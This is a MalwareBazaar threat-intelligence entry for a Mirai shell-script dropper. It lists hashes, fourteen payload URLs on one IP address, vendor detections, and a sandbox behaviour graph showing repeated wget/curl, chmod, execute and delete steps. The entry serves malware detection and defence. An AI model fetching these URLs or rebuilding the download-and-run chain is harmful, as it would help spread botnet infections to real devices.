MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 d513e92a5b874779ffa41df508f054038b520cf05d179427d2fd84bda5d695d5. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry


Mirai


Vendor detections: 9


Intelligence 9 IOCs YARA 1 File information Comments
Download sample Add tag Delete this sample Report a False Positive

SHA256 hash: d513e92a5b874779ffa41df508f054038b520cf05d179427d2fd84bda5d695d5
SHA3-384 hash: 72ce881f6bc6f8db1b149a9b80501db2cf3a83177dc251c4485fa1dad85ea1cf25c561f0e6ed36d616eb7827c3483cca
SHA1 hash: 47e57ed0dd82319a364e81aa447f6e4e39600b2a
MD5 hash: 6450aa02ff0d90d41d589bb5ed8f0e41
humanhash: uniform-burger-tennis-charlie
File name:1.sh
Download: download sample
Signature Mirai
Create hunting rule
File size:2'179 bytes
First seen:2025-10-03 04:11:58 UTC
Last seen:Never
File type: sh
MIME type:text/x-shellscript
ssdeep 48:141LvR2M5pIiKMCmCQ3gSH4JU/fSWO6NX3Fe+:pRQ3gSwa
TLSH T1D341E5F6A38BCA03D27D87CA3EA50006B010C36BB49F8735DCE9FAC90494E9C7255A85
Magika shell
Reporter abuse_ch
Tags:mirai sh
URLMalware sample (SHA256 hash)SignatureTags
http://157.20.32.209/bins/morte.arc4704e07f48738bd7b4cd44cec97a7c5526a4419fa665fd425ba217425916024a Miraimirai opendir
http://157.20.32.209/bins/morte.armf6d0afe358d658d05afad447734fee5a590e953c6c0f98cbd217a867521f8754 Miraimirai opendir
http://157.20.32.209/bins/morte.arm517bb63761f5c8c1601c331cf193c55c09d4619053f9572b3648ef69e49fd1a89 Miraimirai opendir
http://157.20.32.209/bins/morte.arm6b3cd17f0afa885b377f8b04679e75f7f0827189f0b3f025a3814d156b4db1c38 Miraimirai opendir
http://157.20.32.209/bins/morte.arm709d4f358af13014b924279b5b4318a7da185db5a95b1175fac33a87e93f00b35 Miraimirai opendir
http://157.20.32.209/bins/morte.i686a1617a2f4c04b81e7d8fa32fd63a09ed977cd7607b24b76055b36fdea3112c89 Miraimirai opendir
http://157.20.32.209/bins/morte.m68kcdab74aed8c37c66f1370e839cd48ae264c4bda7f1aae193b516e1c9a52a93ea Miraimirai opendir
http://157.20.32.209/bins/morte.mips1cb41b9c1a9e8123336054934a6ade938b976b5dbb87e852c742ef3f1fa9cdbb Miraimirai opendir
http://157.20.32.209/bins/morte.mpsl9f142d179fbde485e13d3364d65180ee6d62449aff02e35d87447ca0f9417210 Miraimirai opendir
http://157.20.32.209/bins/morte.ppc1dc7e464cdaabeaa49a759a198d6a69d7cfc69014337f7fe1881dc9f3efdb8dd Miraimirai opendir
http://157.20.32.209/bins/morte.sh4bb8425e14a2cc5ce0d44da49e2b28d19e081b6352f48c376c7b0f9b0c92e3054 Miraimirai opendir
http://157.20.32.209/bins/morte.spce43b10988feae69a629b29ad0826d88d485372dabbed9421f2e1094147da7c01 Miraimirai opendir
http://157.20.32.209/bins/morte.x8620eec1f49d7ab9223b5d47b6f464aed12e418942570966eae401968088463f1a Miraimirai opendir
http://157.20.32.209/bins/morte.x86_6416ba16bf6f0d4de4341bf38820777755012f008554f5e482b88cd4a85e97eb8b Miraimirai opendir

Intelligence

File Origin
# of uploads :
1
# of downloads :
22
Origin country :
DE DE
Vendor Threat Intelligence
Detection(s):
URLhaus.3632025.UNOFFICIAL
Create hunting rule

URLhaus.3632062.UNOFFICIAL
Create hunting rule

URLhaus.3632052.UNOFFICIAL
Create hunting rule

URLhaus.3632007.UNOFFICIAL
Create hunting rule

URLhaus.3631994.UNOFFICIAL
Create hunting rule

URLhaus.3632053.UNOFFICIAL
Create hunting rule

URLhaus.3631995.UNOFFICIAL
Create hunting rule

URLhaus.3632056.UNOFFICIAL
Create hunting rule

URLhaus.3632027.UNOFFICIAL
Create hunting rule

URLhaus.3632043.UNOFFICIAL
Create hunting rule

URLhaus.3632003.UNOFFICIAL
Create hunting rule

URLhaus.3632008.UNOFFICIAL
Create hunting rule

URLhaus.3632024.UNOFFICIAL
Create hunting rule

URLhaus.3632006.UNOFFICIAL
Create hunting rule

Verdict:
Malicious
Threat level:
  10/10
Confidence:
100%
Tags:
busybox
Link:
https://www.filescan.io/uploads/68df4d8f674d5fd6aa147be8/reports/d10544c0-9fb4-45dc-920e-f2b9404d1314/overview
Verdict:
Malicious
File Type:
unix shell
First seen:
2025-10-03T01:22:00Z UTC
Last seen:
2025-10-04T13:52:00Z UTC
Hits:
~10
Link:
https://opentip.kaspersky.com/d513e92a5b874779ffa41df508f054038b520cf05d179427d2fd84bda5d695d5/results?tab=lookup
Status:
terminated
Link:
https://sandbox.kunai.rocks/analysis/afae0e6f-3875-4378-a9e5-53a559a4a895
Behavior Graph:
Download SVG
%3 guuid=b2628ca2-1a00-0000-1e91-1359e70a0000 pid=2791 /usr/bin/sudo guuid=903161a4-1a00-0000-1e91-1359e90a0000 pid=2793 /tmp/sample.bin guuid=b2628ca2-1a00-0000-1e91-1359e70a0000 pid=2791->guuid=903161a4-1a00-0000-1e91-1359e90a0000 pid=2793 execve guuid=7984f2a4-1a00-0000-1e91-1359ea0a0000 pid=2794 /usr/bin/cp guuid=903161a4-1a00-0000-1e91-1359e90a0000 pid=2793->guuid=7984f2a4-1a00-0000-1e91-1359ea0a0000 pid=2794 execve guuid=50b9ecaa-1a00-0000-1e91-1359f00a0000 pid=2800 /usr/bin/wget net send-data write-file guuid=903161a4-1a00-0000-1e91-1359e90a0000 pid=2793->guuid=50b9ecaa-1a00-0000-1e91-1359f00a0000 pid=2800 execve guuid=9d8b07e0-1a00-0000-1e91-1359720b0000 pid=2930 /usr/bin/curl net send-data write-file guuid=903161a4-1a00-0000-1e91-1359e90a0000 pid=2793->guuid=9d8b07e0-1a00-0000-1e91-1359720b0000 pid=2930 execve guuid=188d861b-1b00-0000-1e91-1359ca0b0000 pid=3018 /usr/bin/chmod guuid=903161a4-1a00-0000-1e91-1359e90a0000 pid=2793->guuid=188d861b-1b00-0000-1e91-1359ca0b0000 pid=3018 execve guuid=58800c1c-1b00-0000-1e91-1359cc0b0000 pid=3020 /usr/bin/bash guuid=903161a4-1a00-0000-1e91-1359e90a0000 pid=2793->guuid=58800c1c-1b00-0000-1e91-1359cc0b0000 pid=3020 clone guuid=cb62cc1c-1b00-0000-1e91-1359d00b0000 pid=3024 /usr/bin/rm delete-file guuid=903161a4-1a00-0000-1e91-1359e90a0000 pid=2793->guuid=cb62cc1c-1b00-0000-1e91-1359d00b0000 pid=3024 execve guuid=c7dd4e1d-1b00-0000-1e91-1359d20b0000 pid=3026 /usr/bin/wget net send-data write-file guuid=903161a4-1a00-0000-1e91-1359e90a0000 pid=2793->guuid=c7dd4e1d-1b00-0000-1e91-1359d20b0000 pid=3026 execve guuid=cdeca73c-1b00-0000-1e91-1359060c0000 pid=3078 /usr/bin/curl net send-data write-file guuid=903161a4-1a00-0000-1e91-1359e90a0000 pid=2793->guuid=cdeca73c-1b00-0000-1e91-1359060c0000 pid=3078 execve guuid=c53edd5d-1b00-0000-1e91-1359600c0000 pid=3168 /usr/bin/chmod guuid=903161a4-1a00-0000-1e91-1359e90a0000 pid=2793->guuid=c53edd5d-1b00-0000-1e91-1359600c0000 pid=3168 execve guuid=77ec505e-1b00-0000-1e91-1359610c0000 pid=3169 /usr/bin/bash guuid=903161a4-1a00-0000-1e91-1359e90a0000 pid=2793->guuid=77ec505e-1b00-0000-1e91-1359610c0000 pid=3169 clone guuid=ff4da05f-1b00-0000-1e91-1359630c0000 pid=3171 /usr/bin/rm delete-file guuid=903161a4-1a00-0000-1e91-1359e90a0000 pid=2793->guuid=ff4da05f-1b00-0000-1e91-1359630c0000 pid=3171 execve guuid=18709461-1b00-0000-1e91-1359640c0000 pid=3172 /usr/bin/wget net send-data write-file guuid=903161a4-1a00-0000-1e91-1359e90a0000 pid=2793->guuid=18709461-1b00-0000-1e91-1359640c0000 pid=3172 execve guuid=d8899280-1b00-0000-1e91-13598c0c0000 pid=3212 /usr/bin/curl net send-data write-file guuid=903161a4-1a00-0000-1e91-1359e90a0000 pid=2793->guuid=d8899280-1b00-0000-1e91-13598c0c0000 pid=3212 execve guuid=8c233aa1-1b00-0000-1e91-1359ad0c0000 pid=3245 /usr/bin/chmod guuid=903161a4-1a00-0000-1e91-1359e90a0000 pid=2793->guuid=8c233aa1-1b00-0000-1e91-1359ad0c0000 pid=3245 execve guuid=ef5ec9a1-1b00-0000-1e91-1359ae0c0000 pid=3246 /usr/bin/bash guuid=903161a4-1a00-0000-1e91-1359e90a0000 pid=2793->guuid=ef5ec9a1-1b00-0000-1e91-1359ae0c0000 pid=3246 clone guuid=0a9edfa2-1b00-0000-1e91-1359b00c0000 pid=3248 /usr/bin/rm delete-file guuid=903161a4-1a00-0000-1e91-1359e90a0000 pid=2793->guuid=0a9edfa2-1b00-0000-1e91-1359b00c0000 pid=3248 execve guuid=1c8cc7a3-1b00-0000-1e91-1359b10c0000 pid=3249 /usr/bin/wget net send-data write-file guuid=903161a4-1a00-0000-1e91-1359e90a0000 pid=2793->guuid=1c8cc7a3-1b00-0000-1e91-1359b10c0000 pid=3249 execve guuid=ac1b85ce-1b00-0000-1e91-1359020d0000 pid=3330 /usr/bin/curl net send-data write-file guuid=903161a4-1a00-0000-1e91-1359e90a0000 pid=2793->guuid=ac1b85ce-1b00-0000-1e91-1359020d0000 pid=3330 execve guuid=845475fb-1b00-0000-1e91-1359590d0000 pid=3417 /usr/bin/chmod guuid=903161a4-1a00-0000-1e91-1359e90a0000 pid=2793->guuid=845475fb-1b00-0000-1e91-1359590d0000 pid=3417 execve guuid=8574c0fb-1b00-0000-1e91-13595b0d0000 pid=3419 /usr/bin/bash guuid=903161a4-1a00-0000-1e91-1359e90a0000 pid=2793->guuid=8574c0fb-1b00-0000-1e91-13595b0d0000 pid=3419 clone guuid=fbd850fc-1b00-0000-1e91-13595e0d0000 pid=3422 /usr/bin/rm delete-file guuid=903161a4-1a00-0000-1e91-1359e90a0000 pid=2793->guuid=fbd850fc-1b00-0000-1e91-13595e0d0000 pid=3422 execve guuid=e994c000-1c00-0000-1e91-13596a0d0000 pid=3434 /usr/bin/wget net send-data write-file guuid=903161a4-1a00-0000-1e91-1359e90a0000 pid=2793->guuid=e994c000-1c00-0000-1e91-13596a0d0000 pid=3434 execve guuid=5ecb012a-1c00-0000-1e91-1359c30d0000 pid=3523 /usr/bin/curl net send-data write-file guuid=903161a4-1a00-0000-1e91-1359e90a0000 pid=2793->guuid=5ecb012a-1c00-0000-1e91-1359c30d0000 pid=3523 execve guuid=efbe0254-1c00-0000-1e91-1359470e0000 pid=3655 /usr/bin/chmod guuid=903161a4-1a00-0000-1e91-1359e90a0000 pid=2793->guuid=efbe0254-1c00-0000-1e91-1359470e0000 pid=3655 execve guuid=19164954-1c00-0000-1e91-1359480e0000 pid=3656 /usr/bin/bash guuid=903161a4-1a00-0000-1e91-1359e90a0000 pid=2793->guuid=19164954-1c00-0000-1e91-1359480e0000 pid=3656 clone guuid=503ae054-1c00-0000-1e91-13594c0e0000 pid=3660 /usr/bin/rm delete-file guuid=903161a4-1a00-0000-1e91-1359e90a0000 pid=2793->guuid=503ae054-1c00-0000-1e91-13594c0e0000 pid=3660 execve guuid=7bb03c55-1c00-0000-1e91-13594d0e0000 pid=3661 /usr/bin/wget net send-data write-file guuid=903161a4-1a00-0000-1e91-1359e90a0000 pid=2793->guuid=7bb03c55-1c00-0000-1e91-13594d0e0000 pid=3661 execve guuid=71370874-1c00-0000-1e91-1359a80e0000 pid=3752 /usr/bin/curl net send-data write-file guuid=903161a4-1a00-0000-1e91-1359e90a0000 pid=2793->guuid=71370874-1c00-0000-1e91-1359a80e0000 pid=3752 execve guuid=08841095-1c00-0000-1e91-1359240f0000 pid=3876 /usr/bin/chmod guuid=903161a4-1a00-0000-1e91-1359e90a0000 pid=2793->guuid=08841095-1c00-0000-1e91-1359240f0000 pid=3876 execve guuid=ddb45495-1c00-0000-1e91-1359260f0000 pid=3878 /tmp/morte.i686 net guuid=903161a4-1a00-0000-1e91-1359e90a0000 pid=2793->guuid=ddb45495-1c00-0000-1e91-1359260f0000 pid=3878 execve guuid=b448e795-1c00-0000-1e91-1359290f0000 pid=3881 /usr/bin/rm delete-file guuid=903161a4-1a00-0000-1e91-1359e90a0000 pid=2793->guuid=b448e795-1c00-0000-1e91-1359290f0000 pid=3881 execve guuid=e3d83596-1c00-0000-1e91-13592a0f0000 pid=3882 /usr/bin/wget net send-data write-file guuid=903161a4-1a00-0000-1e91-1359e90a0000 pid=2793->guuid=e3d83596-1c00-0000-1e91-13592a0f0000 pid=3882 execve guuid=4a9cf6be-1c00-0000-1e91-1359c40f0000 pid=4036 /usr/bin/curl net send-data write-file guuid=903161a4-1a00-0000-1e91-1359e90a0000 pid=2793->guuid=4a9cf6be-1c00-0000-1e91-1359c40f0000 pid=4036 execve guuid=df4bbbeb-1c00-0000-1e91-135974100000 pid=4212 /usr/bin/chmod guuid=903161a4-1a00-0000-1e91-1359e90a0000 pid=2793->guuid=df4bbbeb-1c00-0000-1e91-135974100000 pid=4212 execve guuid=0836f9eb-1c00-0000-1e91-135976100000 pid=4214 /usr/bin/bash guuid=903161a4-1a00-0000-1e91-1359e90a0000 pid=2793->guuid=0836f9eb-1c00-0000-1e91-135976100000 pid=4214 clone guuid=9f6b7fec-1c00-0000-1e91-13597a100000 pid=4218 /usr/bin/rm delete-file guuid=903161a4-1a00-0000-1e91-1359e90a0000 pid=2793->guuid=9f6b7fec-1c00-0000-1e91-13597a100000 pid=4218 execve guuid=cd64c2ec-1c00-0000-1e91-13597c100000 pid=4220 /usr/bin/wget net send-data write-file guuid=903161a4-1a00-0000-1e91-1359e90a0000 pid=2793->guuid=cd64c2ec-1c00-0000-1e91-13597c100000 pid=4220 execve guuid=6bb65d15-1d00-0000-1e91-13590a110000 pid=4362 /usr/bin/curl net send-data write-file guuid=903161a4-1a00-0000-1e91-1359e90a0000 pid=2793->guuid=6bb65d15-1d00-0000-1e91-13590a110000 pid=4362 execve guuid=a3886f42-1d00-0000-1e91-135984110000 pid=4484 /usr/bin/chmod guuid=903161a4-1a00-0000-1e91-1359e90a0000 pid=2793->guuid=a3886f42-1d00-0000-1e91-135984110000 pid=4484 execve guuid=9efad642-1d00-0000-1e91-135986110000 pid=4486 /usr/bin/bash guuid=903161a4-1a00-0000-1e91-1359e90a0000 pid=2793->guuid=9efad642-1d00-0000-1e91-135986110000 pid=4486 clone guuid=bc6f9f43-1d00-0000-1e91-13598c110000 pid=4492 /usr/bin/rm delete-file guuid=903161a4-1a00-0000-1e91-1359e90a0000 pid=2793->guuid=bc6f9f43-1d00-0000-1e91-13598c110000 pid=4492 execve guuid=6de00144-1d00-0000-1e91-13598d110000 pid=4493 /usr/bin/wget net send-data write-file guuid=903161a4-1a00-0000-1e91-1359e90a0000 pid=2793->guuid=6de00144-1d00-0000-1e91-13598d110000 pid=4493 execve guuid=7a3d0a6d-1d00-0000-1e91-1359f4110000 pid=4596 /usr/bin/curl net send-data write-file guuid=903161a4-1a00-0000-1e91-1359e90a0000 pid=2793->guuid=7a3d0a6d-1d00-0000-1e91-1359f4110000 pid=4596 execve guuid=93660d98-1d00-0000-1e91-13596e120000 pid=4718 /usr/bin/chmod guuid=903161a4-1a00-0000-1e91-1359e90a0000 pid=2793->guuid=93660d98-1d00-0000-1e91-13596e120000 pid=4718 execve guuid=cd716798-1d00-0000-1e91-135971120000 pid=4721 /usr/bin/bash guuid=903161a4-1a00-0000-1e91-1359e90a0000 pid=2793->guuid=cd716798-1d00-0000-1e91-135971120000 pid=4721 clone guuid=5b98279a-1d00-0000-1e91-13597b120000 pid=4731 /usr/bin/rm delete-file guuid=903161a4-1a00-0000-1e91-1359e90a0000 pid=2793->guuid=5b98279a-1d00-0000-1e91-13597b120000 pid=4731 execve guuid=99b5ff9a-1d00-0000-1e91-13597f120000 pid=4735 /usr/bin/wget net send-data write-file guuid=903161a4-1a00-0000-1e91-1359e90a0000 pid=2793->guuid=99b5ff9a-1d00-0000-1e91-13597f120000 pid=4735 execve guuid=a5aee1b9-1d00-0000-1e91-1359cc120000 pid=4812 /usr/bin/curl net send-data write-file guuid=903161a4-1a00-0000-1e91-1359e90a0000 pid=2793->guuid=a5aee1b9-1d00-0000-1e91-1359cc120000 pid=4812 execve guuid=6a7bc8da-1d00-0000-1e91-13591e130000 pid=4894 /usr/bin/chmod guuid=903161a4-1a00-0000-1e91-1359e90a0000 pid=2793->guuid=6a7bc8da-1d00-0000-1e91-13591e130000 pid=4894 execve guuid=d6771cdb-1d00-0000-1e91-135920130000 pid=4896 /usr/bin/bash guuid=903161a4-1a00-0000-1e91-1359e90a0000 pid=2793->guuid=d6771cdb-1d00-0000-1e91-135920130000 pid=4896 clone guuid=66ece1db-1d00-0000-1e91-135924130000 pid=4900 /usr/bin/rm delete-file guuid=903161a4-1a00-0000-1e91-1359e90a0000 pid=2793->guuid=66ece1db-1d00-0000-1e91-135924130000 pid=4900 execve guuid=744a7ddc-1d00-0000-1e91-135928130000 pid=4904 /usr/bin/wget net send-data write-file guuid=903161a4-1a00-0000-1e91-1359e90a0000 pid=2793->guuid=744a7ddc-1d00-0000-1e91-135928130000 pid=4904 execve guuid=4971b205-1e00-0000-1e91-1359c5130000 pid=5061 /usr/bin/curl net send-data write-file guuid=903161a4-1a00-0000-1e91-1359e90a0000 pid=2793->guuid=4971b205-1e00-0000-1e91-1359c5130000 pid=5061 execve guuid=cfd1fd32-1e00-0000-1e91-135931140000 pid=5169 /usr/bin/chmod guuid=903161a4-1a00-0000-1e91-1359e90a0000 pid=2793->guuid=cfd1fd32-1e00-0000-1e91-135931140000 pid=5169 execve guuid=30447b33-1e00-0000-1e91-135933140000 pid=5171 /usr/bin/bash guuid=903161a4-1a00-0000-1e91-1359e90a0000 pid=2793->guuid=30447b33-1e00-0000-1e91-135933140000 pid=5171 clone guuid=00faa435-1e00-0000-1e91-135939140000 pid=5177 /usr/bin/rm delete-file guuid=903161a4-1a00-0000-1e91-1359e90a0000 pid=2793->guuid=00faa435-1e00-0000-1e91-135939140000 pid=5177 execve guuid=55adbe3e-1e00-0000-1e91-135941140000 pid=5185 /usr/bin/wget net send-data write-file guuid=903161a4-1a00-0000-1e91-1359e90a0000 pid=2793->guuid=55adbe3e-1e00-0000-1e91-135941140000 pid=5185 execve guuid=094f4668-1e00-0000-1e91-13596b140000 pid=5227 /usr/bin/curl net send-data write-file guuid=903161a4-1a00-0000-1e91-1359e90a0000 pid=2793->guuid=094f4668-1e00-0000-1e91-13596b140000 pid=5227 execve guuid=ffe34e93-1e00-0000-1e91-1359ae140000 pid=5294 /usr/bin/chmod guuid=903161a4-1a00-0000-1e91-1359e90a0000 pid=2793->guuid=ffe34e93-1e00-0000-1e91-1359ae140000 pid=5294 execve guuid=f6b1d993-1e00-0000-1e91-1359af140000 pid=5295 /usr/bin/bash guuid=903161a4-1a00-0000-1e91-1359e90a0000 pid=2793->guuid=f6b1d993-1e00-0000-1e91-1359af140000 pid=5295 clone guuid=8631ec94-1e00-0000-1e91-1359b1140000 pid=5297 /usr/bin/rm delete-file guuid=903161a4-1a00-0000-1e91-1359e90a0000 pid=2793->guuid=8631ec94-1e00-0000-1e91-1359b1140000 pid=5297 execve guuid=4dd86a95-1e00-0000-1e91-1359b2140000 pid=5298 /usr/bin/wget net send-data write-file guuid=903161a4-1a00-0000-1e91-1359e90a0000 pid=2793->guuid=4dd86a95-1e00-0000-1e91-1359b2140000 pid=5298 execve guuid=9c285ab4-1e00-0000-1e91-1359b3140000 pid=5299 /usr/bin/curl net send-data write-file guuid=903161a4-1a00-0000-1e91-1359e90a0000 pid=2793->guuid=9c285ab4-1e00-0000-1e91-1359b3140000 pid=5299 execve guuid=1f35aed8-1e00-0000-1e91-1359b4140000 pid=5300 /usr/bin/chmod guuid=903161a4-1a00-0000-1e91-1359e90a0000 pid=2793->guuid=1f35aed8-1e00-0000-1e91-1359b4140000 pid=5300 execve guuid=d26120d9-1e00-0000-1e91-1359b5140000 pid=5301 /tmp/morte.x86 net guuid=903161a4-1a00-0000-1e91-1359e90a0000 pid=2793->guuid=d26120d9-1e00-0000-1e91-1359b5140000 pid=5301 execve guuid=c04cefd9-1e00-0000-1e91-1359b8140000 pid=5304 /usr/bin/rm delete-file guuid=903161a4-1a00-0000-1e91-1359e90a0000 pid=2793->guuid=c04cefd9-1e00-0000-1e91-1359b8140000 pid=5304 execve guuid=5a374fda-1e00-0000-1e91-1359b9140000 pid=5305 /usr/bin/wget net send-data write-file guuid=903161a4-1a00-0000-1e91-1359e90a0000 pid=2793->guuid=5a374fda-1e00-0000-1e91-1359b9140000 pid=5305 execve guuid=f16587f9-1e00-0000-1e91-1359bd140000 pid=5309 /usr/bin/curl net send-data write-file guuid=903161a4-1a00-0000-1e91-1359e90a0000 pid=2793->guuid=f16587f9-1e00-0000-1e91-1359bd140000 pid=5309 execve guuid=5ff1b31c-1f00-0000-1e91-1359be140000 pid=5310 /usr/bin/chmod guuid=903161a4-1a00-0000-1e91-1359e90a0000 pid=2793->guuid=5ff1b31c-1f00-0000-1e91-1359be140000 pid=5310 execve guuid=a9fc001d-1f00-0000-1e91-1359bf140000 pid=5311 /tmp/morte.x86_64 mprotect-exec net guuid=903161a4-1a00-0000-1e91-1359e90a0000 pid=2793->guuid=a9fc001d-1f00-0000-1e91-1359bf140000 pid=5311 execve guuid=0535831d-1f00-0000-1e91-1359c1140000 pid=5313 /usr/bin/rm delete-file guuid=903161a4-1a00-0000-1e91-1359e90a0000 pid=2793->guuid=0535831d-1f00-0000-1e91-1359c1140000 pid=5313 execve 3ec9d820-2553-5143-b726-8f9a2d649b55 157.20.32.209:80 guuid=50b9ecaa-1a00-0000-1e91-1359f00a0000 pid=2800->3ec9d820-2553-5143-b726-8f9a2d649b55 send: 142B guuid=9d8b07e0-1a00-0000-1e91-1359720b0000 pid=2930->3ec9d820-2553-5143-b726-8f9a2d649b55 send: 91B guuid=c7dd4e1d-1b00-0000-1e91-1359d20b0000 pid=3026->3ec9d820-2553-5143-b726-8f9a2d649b55 send: 142B guuid=cdeca73c-1b00-0000-1e91-1359060c0000 pid=3078->3ec9d820-2553-5143-b726-8f9a2d649b55 send: 91B guuid=18709461-1b00-0000-1e91-1359640c0000 pid=3172->3ec9d820-2553-5143-b726-8f9a2d649b55 send: 143B guuid=d8899280-1b00-0000-1e91-13598c0c0000 pid=3212->3ec9d820-2553-5143-b726-8f9a2d649b55 send: 92B guuid=1c8cc7a3-1b00-0000-1e91-1359b10c0000 pid=3249->3ec9d820-2553-5143-b726-8f9a2d649b55 send: 143B guuid=ac1b85ce-1b00-0000-1e91-1359020d0000 pid=3330->3ec9d820-2553-5143-b726-8f9a2d649b55 send: 92B guuid=e994c000-1c00-0000-1e91-13596a0d0000 pid=3434->3ec9d820-2553-5143-b726-8f9a2d649b55 send: 143B guuid=5ecb012a-1c00-0000-1e91-1359c30d0000 pid=3523->3ec9d820-2553-5143-b726-8f9a2d649b55 send: 92B guuid=7bb03c55-1c00-0000-1e91-13594d0e0000 pid=3661->3ec9d820-2553-5143-b726-8f9a2d649b55 send: 143B guuid=71370874-1c00-0000-1e91-1359a80e0000 pid=3752->3ec9d820-2553-5143-b726-8f9a2d649b55 send: 92B 8b0a01dc-0728-52c1-8024-c4ba7801b8d6 8.8.8.8:53 guuid=ddb45495-1c00-0000-1e91-1359260f0000 pid=3878->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 con guuid=a697db95-1c00-0000-1e91-1359270f0000 pid=3879 /tmp/morte.i686 guuid=ddb45495-1c00-0000-1e91-1359260f0000 pid=3878->guuid=a697db95-1c00-0000-1e91-1359270f0000 pid=3879 clone guuid=42bce695-1c00-0000-1e91-1359280f0000 pid=3880 /tmp/morte.i686 write-config zombie guuid=a697db95-1c00-0000-1e91-1359270f0000 pid=3879->guuid=42bce695-1c00-0000-1e91-1359280f0000 pid=3880 clone guuid=488d5f99-1c00-0000-1e91-1359360f0000 pid=3894 /usr/bin/dash guuid=42bce695-1c00-0000-1e91-1359280f0000 pid=3880->guuid=488d5f99-1c00-0000-1e91-1359360f0000 pid=3894 execve guuid=377aac9b-1c00-0000-1e91-1359410f0000 pid=3905 /tmp/morte.i686 delete-file dns net send-data guuid=42bce695-1c00-0000-1e91-1359280f0000 pid=3880->guuid=377aac9b-1c00-0000-1e91-1359410f0000 pid=3905 clone guuid=ff19821d-2000-0000-1e91-1359cd140000 pid=5325 /tmp/morte.i686 dns net send-data guuid=42bce695-1c00-0000-1e91-1359280f0000 pid=3880->guuid=ff19821d-2000-0000-1e91-1359cd140000 pid=5325 clone guuid=e3d83596-1c00-0000-1e91-13592a0f0000 pid=3882->3ec9d820-2553-5143-b726-8f9a2d649b55 send: 143B guuid=137d8b99-1c00-0000-1e91-1359380f0000 pid=3896 /usr/bin/cp guuid=488d5f99-1c00-0000-1e91-1359360f0000 pid=3894->guuid=137d8b99-1c00-0000-1e91-1359380f0000 pid=3896 execve guuid=377aac9b-1c00-0000-1e91-1359410f0000 pid=3905->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 send: 775B 310a0ed0-c544-54ca-bf3f-fca55e459297 65.222.202.53:80 guuid=377aac9b-1c00-0000-1e91-1359410f0000 pid=3905->310a0ed0-c544-54ca-bf3f-fca55e459297 con guuid=4a9cf6be-1c00-0000-1e91-1359c40f0000 pid=4036->3ec9d820-2553-5143-b726-8f9a2d649b55 send: 92B guuid=cd64c2ec-1c00-0000-1e91-13597c100000 pid=4220->3ec9d820-2553-5143-b726-8f9a2d649b55 send: 143B guuid=6bb65d15-1d00-0000-1e91-13590a110000 pid=4362->3ec9d820-2553-5143-b726-8f9a2d649b55 send: 92B guuid=6de00144-1d00-0000-1e91-13598d110000 pid=4493->3ec9d820-2553-5143-b726-8f9a2d649b55 send: 143B guuid=7a3d0a6d-1d00-0000-1e91-1359f4110000 pid=4596->3ec9d820-2553-5143-b726-8f9a2d649b55 send: 92B guuid=99b5ff9a-1d00-0000-1e91-13597f120000 pid=4735->3ec9d820-2553-5143-b726-8f9a2d649b55 send: 142B guuid=a5aee1b9-1d00-0000-1e91-1359cc120000 pid=4812->3ec9d820-2553-5143-b726-8f9a2d649b55 send: 91B guuid=744a7ddc-1d00-0000-1e91-135928130000 pid=4904->3ec9d820-2553-5143-b726-8f9a2d649b55 send: 142B guuid=4971b205-1e00-0000-1e91-1359c5130000 pid=5061->3ec9d820-2553-5143-b726-8f9a2d649b55 send: 91B guuid=55adbe3e-1e00-0000-1e91-135941140000 pid=5185->3ec9d820-2553-5143-b726-8f9a2d649b55 send: 142B guuid=094f4668-1e00-0000-1e91-13596b140000 pid=5227->3ec9d820-2553-5143-b726-8f9a2d649b55 send: 91B guuid=4dd86a95-1e00-0000-1e91-1359b2140000 pid=5298->3ec9d820-2553-5143-b726-8f9a2d649b55 send: 142B guuid=9c285ab4-1e00-0000-1e91-1359b3140000 pid=5299->3ec9d820-2553-5143-b726-8f9a2d649b55 send: 91B guuid=d26120d9-1e00-0000-1e91-1359b5140000 pid=5301->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 con guuid=171eded9-1e00-0000-1e91-1359b6140000 pid=5302 /tmp/morte.x86 guuid=d26120d9-1e00-0000-1e91-1359b5140000 pid=5301->guuid=171eded9-1e00-0000-1e91-1359b6140000 pid=5302 clone guuid=ae74ecd9-1e00-0000-1e91-1359b7140000 pid=5303 /tmp/morte.x86 write-config zombie guuid=171eded9-1e00-0000-1e91-1359b6140000 pid=5302->guuid=ae74ecd9-1e00-0000-1e91-1359b7140000 pid=5303 clone guuid=189e7ddd-1e00-0000-1e91-1359ba140000 pid=5306 /usr/bin/dash guuid=ae74ecd9-1e00-0000-1e91-1359b7140000 pid=5303->guuid=189e7ddd-1e00-0000-1e91-1359ba140000 pid=5306 execve guuid=9c7547e0-1e00-0000-1e91-1359bc140000 pid=5308 /tmp/morte.x86 dns net send-data zombie guuid=ae74ecd9-1e00-0000-1e91-1359b7140000 pid=5303->guuid=9c7547e0-1e00-0000-1e91-1359bc140000 pid=5308 clone guuid=5a374fda-1e00-0000-1e91-1359b9140000 pid=5305->3ec9d820-2553-5143-b726-8f9a2d649b55 send: 145B guuid=41bdb4dd-1e00-0000-1e91-1359bb140000 pid=5307 /usr/bin/cp guuid=189e7ddd-1e00-0000-1e91-1359ba140000 pid=5306->guuid=41bdb4dd-1e00-0000-1e91-1359bb140000 pid=5307 execve guuid=9c7547e0-1e00-0000-1e91-1359bc140000 pid=5308->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 send: 775B guuid=9c7547e0-1e00-0000-1e91-1359bc140000 pid=5308->310a0ed0-c544-54ca-bf3f-fca55e459297 con guuid=f16587f9-1e00-0000-1e91-1359bd140000 pid=5309->3ec9d820-2553-5143-b726-8f9a2d649b55 send: 94B guuid=a9fc001d-1f00-0000-1e91-1359bf140000 pid=5311->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 con guuid=c78f771d-1f00-0000-1e91-1359c0140000 pid=5312 /tmp/morte.x86_64 zombie guuid=a9fc001d-1f00-0000-1e91-1359bf140000 pid=5311->guuid=c78f771d-1f00-0000-1e91-1359c0140000 pid=5312 clone guuid=d92f8a1d-1f00-0000-1e91-1359c2140000 pid=5314 /tmp/morte.x86_64 write-config zombie guuid=c78f771d-1f00-0000-1e91-1359c0140000 pid=5312->guuid=d92f8a1d-1f00-0000-1e91-1359c2140000 pid=5314 clone guuid=27d5c41d-1f00-0000-1e91-1359c3140000 pid=5315 /usr/bin/dash guuid=d92f8a1d-1f00-0000-1e91-1359c2140000 